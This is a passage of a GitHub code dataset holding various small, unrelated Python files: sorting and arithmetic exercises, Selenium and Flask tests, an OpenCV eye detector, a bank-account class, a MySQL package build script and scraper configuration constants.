\n \n \n \"\"\"\n\n report = open('reporte.html', 'w')\n report.write(html_string)\n report.close()\n os.startfile(\"reporte.html\")\n\n\ndef rowGenerator(listgiven):\n rows = \"\"\n for x in listgiven:\n newrow = \"\"\"\n \n \"\"\"+x.getNombre()+\"\"\"\n \"\"\"+str(x.getEdad())+\"\"\"\n \"\"\"+str(x.isActivo())+\"\"\"\n \"\"\"+str(x.getSaldo())+\"\"\" \n \n \"\"\"\n rows += newrow\n return rows\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"DennisV1999/-201800593_TareasLFP","sub_path":"Tarea 4/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1658,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"10026059017","text":"myList = [14,33,27,10,35,19,42,44]\n\ndef isUnsorted(elem1,elem2):\n return elem1 >= elem2\n\ndef insertSort(newElement, myList):\n #Check all elem\n myList.append(newElement)\n for i in range(1,len(myList)):\n j = i\n #Sort elem\n while (j>0):\n if(isUnsorted(myList[j-1],myList[j])):\n temp = myList[j-1]\n myList[j-1] = myList[j]\n myList[j] = temp\n j-=1\n else:\n break\n return myList\n\nprint(insertSort(3,myList))","repo_name":"SofiaLouisy/ComplexityExample","sub_path":"ComplexityExample/insertSort.py","file_name":"insertSort.py","file_ext":"py","file_size_in_byte":533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"33710021257","text":"\"\"\"\nPrints the expected profit.\n\nKeyword arguments:\nPRICE_PER_USER\nTOTAL_USERS\nEXPENSES\nPROFIT_PREV_YEAR\n\"\"\"\nfrom os import sys\n\nPRICE_PER_USER = float(sys.argv[1])\nTOTAL_USERS = float(sys.argv[2])\nEXPENSES = float(sys.argv[3])\n\nPROFIT_PREV_YEAR = 1000\nif len(sys.argv) == 5:\n PROFIT_PREV_YEAR = float(sys.argv[4])\nTAXES = 0.35\n\nINCOME = PRICE_PER_USER * TOTAL_USERS\nPROFIT_CURR_YEAR = INCOME - EXPENSES\n\nif PROFIT_CURR_YEAR > 0:\n PROFIT_CURR_YEAR *= (1 - TAXES)\n\nRATE_PERCENT = PROFIT_CURR_YEAR * 100 / PROFIT_PREV_YEAR\n\nprint(\"\")\nprint(\"Utilidades actuales vs. 
año anterior = {}%\".format(RATE_PERCENT))\n","repo_name":"gus-morales/dlatam_ds","sub_path":"desafios/_vault/m1_w01/emprendedor3.py","file_name":"emprendedor3.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"20090107496","text":"import pytest\nfrom selenium import webdriver\nfrom selenium.webdriver.support.wait import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.by import By\nimport time\n\n@pytest.fixture\ndef driver(request):\n wd = webdriver.Chrome() # Optional argument, if not specified will search path.\n# wd = webdriver.Ie()\n\n print(wd.capabilities)\n# wd.implicitly_wait(1)\n request.addfinalizer(wd.quit)\n return wd\n\ndef check_value(cur_val, expect_val):\n if cur_val == expect_val:\n return True\n else:\n return False\n\ndef compare_dicts(dict1, dict2):\n for key in dict1:\n if dict1[key] == dict2[key]:\n result = True\n else:\n result = False\n print(\"Не совпало значение с ожидаемым для свойства '\" + key + \"'\")\n\n return result\n\ndef check_dict(dict):\n for key in dict:\n if dict[key] == True:\n result = True\n else:\n result = False\n print(\"Не прошло проверку атрибут стиля '\" + key + \"'\")\n return result\n\ndef check_style_by_attribute(webdriver, locator, atr_value):\n attr = webdriver.find_element_by_css_selector(locator).get_attribute(\"class\")\n if attr == atr_value:\n return True\n else:\n return False\n\n\ndef get_el_product(webdriver, locator):\n element = webdriver.find_elements_by_css_selector(locator)\n return element[0]\n\ndef check_product_prop_and_styles(driver):\n dict_product_lst_props = {}\n dict_product_props = {}\n dict_el_style = {}\n\n# получение свойств и стилей продукта на главной странице\n product = get_el_product(driver, \"div#box-campaigns a.link\")\n dict_product_lst_props[\"prod_title\"] = product.get_attribute(\"title\")\n\n reg_pr_element = product.find_element_by_css_selector(\"s.regular-price\")\n dict_product_lst_props[\"reg_price\"] = reg_pr_element.get_attribute(\"textContent\")\n lst_reg_pr_color = reg_pr_element.value_of_css_property(\"color\")\n\n camp_pr_element = product.find_element_by_css_selector(\"strong.campaign-price\")\n dict_product_lst_props[\"campaign_price\"] = camp_pr_element.get_attribute(\"textContent\")\n lst_camp_pr_color = camp_pr_element.value_of_css_property(\"color\")\n\n# проверяем стиль цены на первой страницы\n dict_el_style[\"lst_s\"] = check_style_by_attribute(product, \"s\", \"regular-price\")\n dict_el_style[\"lst_strong\"] = check_style_by_attribute(product, \"strong\", \"campaign-price\")\n\n product.click()\n# проверяем появления заголовка страницы продукта\n WebDriverWait(driver, 10).until(lambda driver : driver.find_element_by_css_selector(\"div#box-product h1.title\"))\n\n# получение свойств и стилей продукта на странице выбранного продукта\n sel_product = get_el_product(driver, \"div#box-product h1.title\")\n dict_product_props[\"prod_title\"] = sel_product.get_attribute(\"textContent\")\n\n sel_reg_pr_element = get_el_product(driver,\"div.content s.regular-price\")\n dict_product_props[\"reg_price\"] = sel_reg_pr_element.get_attribute(\"textContent\")\n reg_pr_color = sel_reg_pr_element.value_of_css_property(\"color\")\n\n sel_camp_pr_element = get_el_product(driver,\"div.content strong.campaign-price\")\n dict_product_props[\"campaign_price\"] = sel_camp_pr_element.get_attribute(\"textContent\")\n camp_pr_color = 
sel_camp_pr_element.value_of_css_property(\"color\")\n\n# проверяем стиль цены на второй странице товара\n dict_el_style[\"pr_s\"] = check_style_by_attribute(driver, \"div.content s\", \"regular-price\")\n dict_el_style[\"pr_strong\"] = check_style_by_attribute(driver, \"div.price-wrapper strong\", \"campaign-price\")\n\n# проверяем совпадение цвета цены скидки\n dict_el_style[\"color\"] = check_value(lst_camp_pr_color, camp_pr_color)\n\n# driver.back()\n\n# проверяем совпадение атрибутов товара и стилей товара на 2-х страницах\n prop_result = compare_dicts(dict_product_lst_props, dict_product_props)\n style_res = check_dict(dict_el_style)\n\n assert prop_result == True\n assert style_res == True\n\ndef test_example(driver):\n driver.get('http://localhost/litecart/')\n check_product_prop_and_styles(driver)\n","repo_name":"kukushdi3981/sel-1_test-project","sub_path":"task10_check_product_property_and_styles.py","file_name":"task10_check_product_property_and_styles.py","file_ext":"py","file_size_in_byte":4507,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"32196016724","text":"import heapq\n\nN = int(input())\ncards = [int(input()) for _ in range(N)]\nif len(cards) == 1:\n if cards[0] == 1: print(0)\n else: print(cards[0])\nelse:\n answer = 0\n heapq.heapify(cards)\n while cards:\n card1 = heapq.heappop(cards)\n card2 = heapq.heappop(cards)\n sum_val = card1 + card2\n answer += sum_val\n if len(cards): heapq.heappush(cards, sum_val)\n\n print(answer)","repo_name":"psj8532/problem_solving","sub_path":"BOJ/그리디/카드정렬하기.py","file_name":"카드정렬하기.py","file_ext":"py","file_size_in_byte":416,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"40886825772","text":"def producto_escalar():\r\n # Obtener la longitud de los vectores del usuario\r\n n = int(input(\"Ingrese la longitud de los vectores: \"))\r\n\r\n # Inicializar los vectores con ceros\r\n vector_a = [0] * n\r\n vector_b = [0] * n\r\n\r\n # Solicitar al usuario ingresar los elementos de los vectores\r\n print(\"Ingrese los elementos del primer vector:\")\r\n for i in range(n):\r\n vector_a[i] = float(input(f\"Elemento {i + 1}: \"))\r\n\r\n print(\"Ingrese los elementos del segundo vector:\")\r\n for i in range(n):\r\n vector_b[i] = float(input(f\"Elemento {i + 1}: \"))\r\n\r\n # Calcular el producto escalar\r\n producto = sum(a * b for a, b in zip(vector_a, vector_b))\r\n\r\n # Mostrar el resultado\r\n print(f\"El producto escalar de los vectores es: {producto}\")\r\n\r\n# Llamar a la función\r\nproducto_escalar()\r\n","repo_name":"Luke231424234345/mc-lucas-porras-2023","sub_path":"Taller # 13.1.py","file_name":"Taller # 13.1.py","file_ext":"py","file_size_in_byte":824,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"28215478363","text":"#!/usr/bin/env python\n\n# Python 2/3 compatibility\nfrom __future__ import print_function\n\nimport numpy as np\nimport cv2\nimport glob, os.path, shutil, os, sys\n\nhelp_message = '''\nUSAGE: facedetect.py [--cascade ] [--nested-cascade ] []\n'''\n\ndef detect(img, cascade):\n rects = cascade.detectMultiScale(img, scaleFactor=1.3, minNeighbors=4, minSize=(20, 20), flags = cv2.CASCADE_SCALE_IMAGE)\n if len(rects) == 0:\n return rects\n rects[:,2:] += rects[:,:2]\n return rects\n\ndef draw_rects(img, rects, color):\n for x1, y1, x2, y2 in rects:\n cv2.rectangle(img, (x1, y1), (x2, y2), color, 2)\n\ndef main():\n fd()\n\ndef fd():\n 
cascade_fn = 'haarcascade_eye_tree_eyeglasses.xml'\n\n    cascade = cv2.CascadeClassifier(cascade_fn)\n\n    for f in glob.glob(sys.argv[1]):\n        if not os.path.isfile(f):\n            continue\n        img = cv2.imread(f)\n        print('detecting %s' % f)\n        #cv2.imshow('facedetect', img)\n        #cv2.waitKey(-1)\n\n        gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n        gray = cv2.equalizeHist(gray)\n\n        detected = detect(gray, cascade)\n        if len(detected) != 0:\n            print(\"%s contains face\" % (f))\n            draw_rects(img, detected, (255, 0, 0, 255))\n            cv2.imshow('img',img)\n            cv2.waitKey(0)\n\nif __name__ == '__main__':\n    main()\n","repo_name":"linzj/fetch_bbs_pic","sub_path":"show.py","file_name":"show.py","file_ext":"py","file_size_in_byte":1369,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"25641393249","text":"def main(y):\n    print(\"Give me\",y,\"numbers\")\n    r = int(input())\n    numbers =[]\n    while len(numbers) < y:\n        numbers.append(r)\n        if len(numbers) < y:\n            r = int(input(\"Give me another number\"))\n    print (numbers)\n    #sum of the 10 numbers\n    def function(x):\n        name = x\n        var = 0\n        for i in numbers:\n            var += i\n        result = var/len(numbers)\n        if name == 1:\n            return var\n        else:\n            return result\n    #Paul's blog idea -->https://pololarinette.wordpress.com/2015/10/15/wsq10-lists/\n    #Standard deviation\n    import statistics\n    statistics.stdev(numbers)\n\n    print(\"The sum of the\",y,\"numbers is\",function(1))\n    print(\"The average of the\",y,\"numbers is\",function(2))\n    print(\"The standard deviation is\",statistics.stdev(numbers))\nmain(10)#change the number if you want\n","repo_name":"Jocapear/TC1014","sub_path":"WSQ10.py","file_name":"WSQ10.py","file_ext":"py","file_size_in_byte":866,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"72938319832","text":"from Foundation import *\nfrom AppKit import *\n\nimport imp\n\nclass STEPluginExecutor(NSObject):\n\t@classmethod\n\tdef loadModuleAtPath_functionName_arguments_(self, path, func, args):\n\t\t\n\t\tf = open(path)\n\t\ttry:\n\t\t\tmod = imp.load_module('plugin', f, path, (\".py\", \"r\", imp.PY_SOURCE))\n\t\t\trealfunc = getattr(mod, func, None)\n\t\t\tif realfunc is not None:\n\t\t\t\trealfunc(*tuple(args))\n\t\texcept Exception as e:\n\t\t\tNSRunAlertPanel('Script Error', '%s' % e, None, None, None)\n\t\tfinally:\n\t\t\tf.close()\n\t\t\treturn NO\n\t\t\n\t\treturn YES\n","repo_name":"bignerdranch/ScriptableTextEditor","sub_path":"STEPluginExecutor.py","file_name":"STEPluginExecutor.py","file_ext":"py","file_size_in_byte":514,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"5"} +{"seq_id":"15591356974","text":"import logging\nimport shutil\nfrom pathlib import Path\n\nimport ncempy.io as nio\nimport numpy as np\nfrom scipy import stats\nfrom skimage.exposure import rescale_intensity\nfrom tifffile import imwrite\n\ntile_conf_header = [\n    \"# Define the number of dimensions we are working on\\n\",\n    \"dim = 2\\n\",\n    \"# Define the image coordinates (in pixels)\\n\",\n]\n\n\ndef get_files(input_dir, filename_filter, logger=logging):\n    files = sorted(Path(input_dir).glob(filename_filter))\n    logger.info(f\"Found {len(files)} files matching '{filename_filter}'.\")\n    return files\n\n\ndef load_ser_file(ser_file, logger=logging):\n    # read .ser file\n    ser_data = nio.ser.serReader(ser_file)\n    if \"metadata\" not in ser_data:\n        logger.warning(f\"No metadata found for file {ser_file}. 
Returning empty dict.\")\n        return {}, ser_data[\"data\"], ser_data[\"pixelSize\"]\n    return ser_data[\"metadata\"], ser_data[\"data\"], ser_data[\"pixelSize\"]\n\n\ndef process_metadata(\n    metadata_list,\n    save_dir,\n    prefixes=[],\n    filename=\"TileConfiguration.txt\",\n    logger=logging,\n):\n    # assert save_dir exists\n    assert Path(save_dir).exists(), f\"Output directory {save_dir} doesn't exist\"\n    with open(Path(save_dir, filename), \"w\") as f:\n        f.writelines(tile_conf_header)\n        for meta in metadata_list:\n            if \"Stage X [um]\" not in meta:\n                logger.warning(f\"Skipping file {meta['image_file_name']}.\")\n                continue\n            # NB: x and y are flipped in the metadata, compared to the pixel data\n            logger.info(f\"Processing file: {meta['image_file_name']}\")\n            logger.info(\n                f\"Metadata: {meta['Stage Y [um]'] / meta['pixel_size']} {meta['Stage X [um]'] / meta['pixel_size']}\"\n            )\n            f.write(\n                f\"{meta['image_file_name']}; ; \"\n                + f\"({meta['Stage Y [um]'] / meta['pixel_size']}, {meta['Stage X [um]'] / meta['pixel_size']})\\n\"\n            )\n    for p in prefixes:\n        shutil.copy(Path(save_dir, filename), Path(save_dir, p))\n\n\ndef export_uint16(data, pixel_size, save_dir, basename, prefix=\"16bit\"):\n    dest_dir = Path(save_dir) / prefix\n    Path(dest_dir).mkdir(parents=True, exist_ok=True)\n    dest_path = Path(dest_dir) / (basename + \".tif\")\n    _write_image_with_calibration(dest_path, data, pixel_size)\n\n\ndef export_normalized_uint8(\n    data, pixel_size, save_dir, basename, prefix=\"8bit\", intensity_range=500\n):\n    dest_dir = Path(save_dir) / prefix\n    Path(dest_dir).mkdir(parents=True, exist_ok=True)\n    dest_path = Path(dest_dir) / (basename + \".tif\")\n    mode = stats.mode(data.flatten(), keepdims=False)\n    normalized = rescale_intensity(\n        data,\n        in_range=(mode[0] - intensity_range, mode[0] + intensity_range),\n        out_range=np.uint8,\n    )\n    _write_image_with_calibration(dest_path, normalized, pixel_size)\n\n\ndef _write_image_with_calibration(dest_path, image, pixel_size):\n    imwrite(\n        dest_path,\n        image,\n        resolution=(\n            1.0 / (pixel_size[0] * 1000 * 1000),\n            1.0 / (pixel_size[1] * 1000 * 1000),\n        ),\n        imagej=True,\n        metadata={\"unit\": \"um\"},\n    )\n","repo_name":"fmi-faim/em-tasks","sub_path":"src/em_tasks/export.py","file_name":"export.py","file_ext":"py","file_size_in_byte":3163,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"26457334809","text":"from itertools import count\nfrom math import sqrt\n\n\ndef counting_rectangles(target):\n    \"\"\"\n    Returns the area of the rectangular grid whose number of contained\n    rectangles is nearest to the target.\n    \"\"\"\n    mindiff = target\n    bestarea = 0\n\n    def rectangles(n, m):\n        return int((n**2 + n) * (m**2 + m) / 4)\n    \n    for i in count(1):\n        for j in count(int(sqrt(4*target/(i**2 + i)))):\n            r = rectangles(i, j)\n            if abs(target - r) < mindiff:\n                mindiff = abs(target - r)\n                bestarea = i * j\n            if r > target:\n                break\n        if i**2 + i > target / 2:\n            break\n    return bestarea\n\n\ndef solve(vol=0):\n    return counting_rectangles(2000000)\n","repo_name":"CaptainSora/Python-Project-Euler","sub_path":"PE085.py","file_name":"PE085.py","file_ext":"py","file_size_in_byte":727,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"38030271636","text":"from Utilities.config import app,db\nfrom Models.users import *\nfrom flask import request\n\n@app.route('/login',methods=['POST'])\ndef LoginUser():\n    data=request.json\n    result=verifyLogin(data)\n    \n    return result\n\nif __name__ == 
\"__main__\":\n app.run(port=5000, debug=True)\n","repo_name":"deepak678/IOT_App_Backend","sub_path":"controller/Login.py","file_name":"Login.py","file_ext":"py","file_size_in_byte":282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"31932509611","text":"from solns.graph.graph import *\nimport unittest\nfrom parameterized import parameterized as p\nfrom solns.dfs.dfs import *\n\nclass UnitTest_Dfs(unittest.TestCase):\n G = Graph()\n G.addEdges(0,[1,2])\n G.addEdges(1,[0,3])\n G.addEdges(2,[0,4])\n G.addEdges(3,[1,5])\n G.addEdges(4,[2,5])\n G.addEdges(5,[3,4])\n @p.expand([\n [0,\"013542\"],[3,\"310245\"],[1,\"102453\"]\n ])\n def test_naive(self,s,expected):\n G = self.G.graph\n seq = Solution.naive(G,s,set(),\"\")\n self.assertEqual(seq,expected)\n","repo_name":"zcemycl/algoTest","sub_path":"py/tests/testDfs/test_Dfs.py","file_name":"test_Dfs.py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"5"} +{"seq_id":"72992114072","text":"import math\nimport pdb\n\nfrom applicants.models import SkillHobby, Feature, JobApplication\n\ndef sigmoid(x):\n return 2 * (1 / (1 + math.pow(math.e, -x / 5)) - 0.5)\n\ndef magic_score(application):\n applicant_features = features(application)\n score = 0\n for applicant_feature in applicant_features:\n feature_model = Feature.objects.get(name=applicant_feature, department=application.job_listing.department)\n score += feature_model.weight\n return sigmoid(score);\n\ndef application_change(application):\n status = application.status\n change = 0\n if status == JobApplication.INTERVIEW_REQUESTED or status == JobApplication.OFFER_GIVEN:\n change = 0.01\n elif status == JobApplication.REJECTED:\n change = -0.01\n else:\n return\n\n applicant_features = features(application)\n\n for applicant_feature in applicant_features:\n change_weight(applicant_feature, change)\n\ndef change_weight(feature, change):\n # pdb.set_trace()\n weight = feature.weight + change\n\n weight = max(weight, 0)\n weight = min(weight, 3)\n\n feature.weight = weight\n feature.save()\n\ndef features(application):\n applicant_features = [];\n applicant = application.applicant\n department = application.job_listing.department\n\n for a_level in applicant.a_levels.all():\n applicant_features.append(Feature.objects.get_or_create(name=a_level.feature_description, department=department)[0])\n\n for degree in applicant.degree.all():\n applicant_features.append(Feature.objects.get_or_create(name=degree.feature_description, department=department)[0])\n\n for skill in applicant.skills_and_hobbies.filter(kind=SkillHobby.SKILL):\n # pdb.set_trace()\n applicant_features.append(Feature.objects.get_or_create(name=skill.feature_description, department=department)[0])\n\n for programming_language in applicant.skills_and_hobbies.filter(kind=SkillHobby.PROGRAMMING_LANGUAGE):\n applicant_features.append(Feature.objects.get_or_create(name=programming_language.feature_description, department=department)[0])\n\n for prior_employment in applicant.prior_employment.all():\n applicant_features.append(Feature.objects.get_or_create(name=prior_employment.feature_description, department=department)[0])\n\n return applicant_features\n","repo_name":"tomallton/Quikruit","sub_path":"quikruit/applicants/algorithm.py","file_name":"algorithm.py","file_ext":"py","file_size_in_byte":2312,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} 
+{"seq_id":"72054834392","text":"\n\"\"\"\nAssignment: Users With Bank Accounts\n\nCreate a User class that has an association with the BankAccount class. You should not have to change anything in the BankAccount class.\n\nFor example, from the User class we should be able to deposit money into the user's account:\nBut our User class does not have a self.account_balance attribute. What it does have is an instance of a BankAccount by the name of self.account. That means that we'll be mirroring the methods created in the BankAccount class like make_deposit (and other methods referencing self.account_balance). But we'll be calling on the BankAccount class to do most of the work! That's the goal of this assignment, and you may find that you do not have to add much logic if any.\n\nRemember in our User methods, we can now access the BankAccount class through our self.account attribute, like so:\nclass User:\n def example_method(self):\n self.account.deposit(100)\t\t# we can call the BankAccount instance's methods\n print(self.account.balance)\t\t# or access its attributes\n\"\"\"\nclass User:\n def __init__(self, name,):\n self.name = name\n self.account = Bank_Account(int_rate=0.01, balance=0)\n\n def deposit(self, amount):\n self.account.deposit(amount)\n print(f\"Made Deposit {amount} to {self.name} account\")\n return self\n\n def withdraw(self, amount):\n self.account.withdraw(amount)\n print(f\"Withdrew ${amount} from {self.name} account\")\n return self\n \n def displayUserBalance(self):\n print(f\"Retrieving {self.name} balance\")\n print(f\"{self.name} Balance {self.account.balance}\")\n\nclass Bank_Account:\n def __init__(self, int_rate=0.01, balance=0):\n self.int_rate = int_rate\n self.balance = balance\n\n def deposit(self, amount):\n self.balance += amount\n return self\n\n def withdraw(self, amount):\n self.balance -= amount\n if self.balance < 0:\n print(\"Insufficient funds: Charging a $5 fee will deduct $5\")\n self.balance = self.balance - 5\n return self\n\n def displayAccountInfo(self):\n print(f\"Balance:{self.balance}\")\n\n def yieldInterest(self):\n if self.balance > 0:\n self.balance += self.balance * self.int_rate\n else:\n print(\"You have a negative account balance.\")\n return self\n\n\nRyan1 = User(\"Ryan\")\nKevin2 = User(\"Kevin\")\nMike3 = User(\"Mike\")\n\nprint(\"*\" * 40)\n\n\nRyan1.displayUserBalance()\nRyan1.deposit(5000).withdraw(500).withdraw(3000).deposit(2000).withdraw(200).displayUserBalance()\n\nprint(\"*\" * 40)\n\nKevin2.displayUserBalance()\nKevin2.deposit(50).withdraw(10).withdraw(10).deposit(10).withdraw(500).displayUserBalance()\n\nprint(\"*\" * 40)\n\nMike3.displayUserBalance()\nMike3.deposit(50000).withdraw(1000).withdraw(500).deposit(20000).withdraw(300).displayUserBalance()\n\n\n\n\n\n\n\n","repo_name":"rsayd/Users_With_Bank_Account.py","sub_path":"Users_With_Bank_Account.py","file_name":"Users_With_Bank_Account.py","file_ext":"py","file_size_in_byte":2866,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"20471401642","text":"from urllib.request import Request, urlopen\n\nimport pytest\n\nfrom main import app\nfrom models.user import User\n\n\n@pytest.fixture\ndef client():\n client = app.test_client()\n\n cleanup() # clean up before every test\n\n # create User model and log it in\n # login is required for all handlers in this file\n success, user, message = User.create(email_address=\"testman@test.man\", password=\"test123\", admin=True)\n 
User._test_mark_email_verified(user=user)\n session_token = User.generate_session_token(user=user)\n client.set_cookie(server_name=\"localhost\", key=\"my-web-app-session\", value=session_token)\n\n yield client\n\n\ndef cleanup():\n # clean up/delete the database (reset Datastore)\n urlopen(Request(\"http://localhost:8002/reset\", data={})) # this sends an empty POST request\n\n\ndef test_admin_users_list_1(client):\n # only one user on the list (the admin)\n response = client.get('/admin/users')\n assert b'Active users' in response.data\n assert b'testman@test.man' in response.data\n assert b'Admin' in response.data\n\n\ndef test_admin_users_list_2(client):\n # create multiple users via Fake Data Loader\n client.get('/load-fake-data')\n\n # go to admin/users and see if users were created\n response = client.get('/admin/users')\n assert b'Active users' in response.data\n assert b'testman@test.man' in response.data\n assert b'Admin' in response.data\n\n assert b'Jim Jones' in response.data\n assert b'user_2@my.webapp' in response.data\n assert b'Load more users' in response.data # load more users button\n\n\ndef test_admin_user_details(client):\n user = User.get_user_by_email(email_address=\"testman@test.man\")\n\n response = client.get('/admin/user/{}'.format(user.get_id))\n\n assert b'testman@test.man' in response.data\n assert b'Admin' in response.data\n","repo_name":"JanVerderber/ninjatodo","sub_path":"tests/admin/test_users.py","file_name":"test_users.py","file_ext":"py","file_size_in_byte":1825,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"12518319709","text":"from pisi.actionsapi import autotools\nfrom pisi.actionsapi import libtools\nfrom pisi.actionsapi import pisitools\nfrom pisi.actionsapi import shelltools\nfrom pisi.actionsapi import get\n\ndef setup():\n # Don't use zlib from source\n pisitools.removeDir(\"zlib\")\n pisitools.dosed(\"configure.in\", \"zlib/Makefile dnl\", \"dnl zlib/Makefile\")\n\n # Plain autoconf doesn't work here...\n shelltools.export(\"WANT_AUTOCONF\", \"2.59\")\n\n autotools.autoreconf(\"--force\")\n libtools.libtoolize(\"--copy --force\")\n libtools.gnuconfig_update()\n\n shelltools.cd(\"innobase/\")\n autotools.autoreconf(\"--force\")\n libtools.libtoolize(\"--copy --force\")\n libtools.gnuconfig_update()\n shelltools.cd(\"../\")\n \n # Export flags\n shelltools.export(\"CFLAGS\", \"%s -DHAVE_ERRNO_AS_DEFINE=1\" % get.CFLAGS())\n shelltools.export(\"CXXFLAGS\", \"%s \\\n -felide-constructors \\\n -fno-exceptions \\\n -fno-rtti\" % get.CXXFLAGS())\n\n # Configure!\n autotools.configure(\"--libexecdir=/usr/sbin \\\n --sysconfdir=/etc/mysql \\\n --localstatedir=/var/lib/mysql \\\n --with-low-memory \\\n --enable-assembler \\\n --enable-local-infile \\\n --with-mysqld-user=mysql \\\n --with-client-ldflags=-lstdc++ \\\n --enable-thread-safe-client \\\n --with-comment=\\\"Pardus Linux\\\" \\\n --with-unix-socket-path=/var/run/mysqld/mysqld.sock \\\n --with-zlib-dir=/usr \\\n --with-lib-ccflags=\\\"-fPIC\\\" \\\n --with-readline \\\n --enable-shared \\\n --enable-static \\\n --with-openssl \\\n --without-debug \\\n --without-bench \\\n --with-charset=utf8 \\\n --with-collation=utf8_general_ci \\\n --with-extra-charsets=all \\\n --with-berkeley-db=./bdb \\\n --with-big-tables\")\n\ndef build():\n autotools.make()\n\ndef install():\n autotools.rawInstall(\"DESTDIR=%s benchdir_root=\\\"/usr/share/mysql\\\"\" % get.installDIR())\n\n # Move libs to /usr/lib\n 
pisitools.domove(\"/usr/lib/mysql/libmysqlclient*.so*\", \"/usr/lib\")\n\n # Links to libs\n pisitools.dosym(\"../libmysqlclient.so\", \"/usr/lib/mysql/libmysqlclient.so\")\n pisitools.dosym(\"../libmysqlclient_r.so \", \"/usr/lib/mysql/libmysqlclient_r.so\")\n\n # Extra headers\n pisitools.insinto(\"/usr/include/mysql\", \"include/my_config.h\")\n pisitools.insinto(\"/usr/include/mysql\", \"include/my_dir.h\")\n\n # Links\n pisitools.dosym(\"mysqlcheck\", \"/usr/bin/mysqlanalyze\")\n pisitools.dosym(\"mysqlcheck\", \"/usr/bin/mysqlrepair\")\n pisitools.dosym(\"mysqlcheck\", \"/usr/bin/mysqloptimize\")\n\n # Cleanup\n pisitools.remove(\"/usr/bin/make*distribution\")\n pisitools.remove(\"/usr/share/mysql/make_*_distribution\")\n pisitools.remove(\"/usr/share/mysql/mysql.server\")\n pisitools.remove(\"/usr/share/mysql/binary-configur\")\n pisitools.remove(\"/usr/share/mysql/mysql-log-rotate\")\n pisitools.remove(\"/usr/share/mysql/postinstall\")\n pisitools.remove(\"/usr/share/mysql/preinstall\")\n pisitools.remove(\"/usr/share/mysql/mi_test*\")\n pisitools.remove(\"/usr/share/mysql/*.spec\")\n pisitools.remove(\"/usr/share/mysql/*.plist\")\n pisitools.remove(\"/usr/share/mysql/my-*.cnf\")\n\n # No perl\n for i in [\"mysqlhotcopy\", \"mysql_find_rows\", \"mysql_convert_table_format\",\n \"mysqld_multi\", \"mysqlaccess\", \"mysql_fix_extensions\",\n \"mysqldumpslow\", \"mysql_zap\", \"mysql_explain_log\", \"mysql_tableinfo\",\n \"mysql_setpermission\"]:\n pisitools.remove(\"/usr/bin/%s\" % i)\n pisitools.removeDir(\"/usr/share/mysql/sql-bench\")\n\n # No tests\n pisitools.removeDir(\"/usr/share/mysql/mysql-test\")\n\n # Config\n pisitools.insinto(\"/etc/mysql\", \"scripts/mysqlaccess.conf\")\n\n # Data dir\n pisitools.dodir(\"/var/lib/mysql\")\n\n # Logs\n pisitools.dodir(\"/var/log/mysql\")\n shelltools.touch(\"%s/var/log/mysql/mysql.log\" % get.installDIR())\n shelltools.touch(\"%s/var/log/mysql/mysql.err\" % get.installDIR())\n\n # Runtime data\n pisitools.dodir(\"/var/run/mysqld\")\n\n # Documents\n pisitools.dodoc(\"README\", \"COPYING\", \"ChangeLog\", \"EXCEPTIONS-CLIENT\", \"INSTALL-SOURCE\")\n pisitools.dohtml(\"Docs/*.html\")\n pisitools.dodoc(\"Docs/manual.txt,\" \"Docs/manual.ps\")\n pisitools.dodoc(\"support-files/my-*.cnf\")\n","repo_name":"pars-linux/pardus-1.0","sub_path":"server/mysql/actions.py","file_name":"actions.py","file_ext":"py","file_size_in_byte":4717,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"25287930031","text":"import os\n\n\nTHINGIVERSE_FLASK_PORT = 8080\nTHINGIVERSE_FLASK_WAIT_PRE = 3\nTHINGIVERSE_FLASK_WAIT_POST = 300\nTHINGIVERSE_FLASK_WAIT_ENABLE = False\nTHINGIVERSE_FLASK_ENDPOINT = '/download'\nTHINGIVERSE_API_NUMBER_PAGES = 1000\nTHINGIVERSE_API_PER_PAGE = 500\nTHINGIVERSE_API_CONCURRENCY = 10\nTHINGIVERSE_API_CONCURRENCY_DOWNLOAD = 50\nTHINGIVERSE_API_AUTH = 'https://www.thingiverse.com/login/oauth/authorize'\nTHINGIVERSE_API_TOKEN = 'https://www.thingiverse.com/login/oauth/access_token'\nTHINGIVERSE_API_DONE = 'https://asuarez.dev/3d-net/docs/images/done.jpeg'\nTHINGIVERSE_API_PACKAGE = 'https://api.thingiverse.com/things/{}/package-url'\nTHINGIVERSE_API_SEARCH = 'https://api.thingiverse.com/search/' \\\n '?page={}&per_page={}&sort=popular&category_id={}&type=things'\n\nDATASET_FOLDER = 'data'\nDATASET_FOLDER_DOWNLOADED = os.path.join(DATASET_FOLDER, 'downloaded')\nDATASET_FOLDER_STANDARDIZED = os.path.join(DATASET_FOLDER, 